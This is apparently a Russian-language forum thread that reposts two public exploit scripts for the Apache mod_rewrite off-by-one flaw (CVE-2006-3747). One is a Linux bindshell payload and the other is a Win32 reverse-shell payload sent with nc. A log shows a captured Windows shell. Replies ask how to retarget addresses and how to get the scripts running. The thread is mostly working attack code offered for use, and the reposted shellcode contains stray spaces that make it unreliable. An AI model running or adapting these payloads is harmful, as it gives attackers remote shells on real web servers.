#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo "by jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%0 6%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0 e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b 0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%c d%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%2 3%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%8 8%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%c d%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

# milw0rm.com [2006-08-21]

milw0rm.com (http://milw0rm.org/exploits/2237)

Поясните, как подбирать адреса под что-то иное, нежели "RewriteRule kung/(.*) $1" и под что-то не "apache 1.3.34 (debian sarge)" ? Чисто технически как?

А есть у когонить скомпилированный вариант :)

// береш линух и компилируеш
или cygwin

host=$1
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%0 6%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0 e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b 0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%c d%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%2 3%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%8 8%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%c d%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

вставляеш в файлик me_fuck.sh и потом bash (ПУТЬКФАЙЛУ)me_fuck 127.0.0.1

я архиолог,помогите мне с этим сплойтом плз..обьясните что к чему...с меня + (:

У меня не получается запускатся на cygwin

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [��?��? 5.2.3790]
# (C) ��?����?����D 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# shellcode ��badchar���������õģ���ʵ����Ҫ��ô��
# �Ҹ����badchar�� 0x3f�� 0x0b ��������ǰ���shellcodeϰ���Ա����
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#


echo -e "mod_rewrite apache off-by-one overflow"


if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi

host=$1

#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
# %3f to trigger the vuln
%3fA%3fA%3f\
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x 51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x 42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x 79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x 6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x 55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x 4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x 79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x 59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x 6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x 38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x 46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x 6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x 41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x 4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x 70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x 50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x 72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x 50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x 56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x 32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x 59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x 33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x 68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x 42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x 79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x 61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x 68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x 49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x 73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x 4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x 6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x 78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x 51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x 30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x 76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x 77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x 46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x 7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80

# milw0rm.com [2007-04-07]


ответ No such file or directory :confused: